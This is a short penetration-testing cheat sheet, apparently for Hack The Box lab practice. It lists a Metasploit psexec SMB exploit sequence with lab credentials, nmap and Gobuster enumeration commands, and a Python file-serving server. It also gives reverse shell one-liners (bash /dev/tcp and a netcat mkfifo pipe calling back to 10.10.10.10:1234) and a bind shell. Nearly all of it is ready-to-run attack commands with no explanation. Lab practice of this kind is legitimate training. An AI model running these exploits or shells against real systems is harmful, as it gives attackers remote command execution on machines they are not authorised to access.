BasicCommands

MSF SMB: Link to heading

msfconsole
search exploit/windows/smb/psexec
use 0
set Rhosts 10.10.10.10
set LHOST 10.10.10.10
set LHOST 10.10.10.10
set SMBUser htb-student
set SMBPass HTB_@cademy_stdnt!
exploit

Basic commands: Link to heading

nmap: Link to heading

nmap -sCV 10.10.10.10

Wget with Python: Link to heading

python3 -m http.server 8000

Directory enumeration with Gobuster: Link to heading

gobuster dir -u http://link.link -w /usr/share/seclists/Discovery/Web-Content/common.txt -o dev_linkvortex_htb_gobuster

Subdomain enumeration with Gobuster: Link to heading

gobuster vhost -u http://link.link -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain -r -o linkvortex_subdomain_gobuster

Reverse shell: Link to heading

bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

nc -lvnp 1234

Bind shell: Link to heading

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash i 2>&1|nc -lvp 1234 >/tmp/f

nc 10.10.10.10 1234